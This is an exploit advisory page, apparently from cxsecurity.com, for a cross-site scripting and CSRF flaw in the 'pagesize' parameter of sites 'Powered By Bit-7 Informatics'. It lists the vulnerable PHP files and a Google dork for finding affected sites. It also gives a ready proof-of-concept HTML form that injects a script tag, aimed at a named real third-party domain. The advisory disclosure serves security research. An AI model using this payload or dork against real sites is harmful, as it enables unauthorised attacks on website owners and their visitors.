Powered By Bit-7 Informatics CSRF XSS

2016.02.12
Credit: Persian Hack Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: "intext:Powered By : Bit-7 Informatics" inurl:.php?id=

###################### # Exploit Title : Powered By Bit-7 Informatics CSRF XSS # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.bit7informatics.com/ # Google Dork : "intext:Powered By : Bit-7 Informatics" inurl:.php?id= # Date: 2016/02/12 # ###################### # Vulnerable PHP File : /download.php # /gallery.php # /news.php # # Vulnerable Parameter : pagesize # Exploit : # #<form id="form1" name="form1" method="post" action="http://dsaindia.org/news.php"> # <input name="pagesize" id="pagesize" value='"><script>alert("Mobham")</script>' /> # <input type="hidden" name="page" id="txtcpage" value="" /> # <input type="submit" value="GO!!"> # </form> # # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) # Homepage : persian-team.ir ######################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top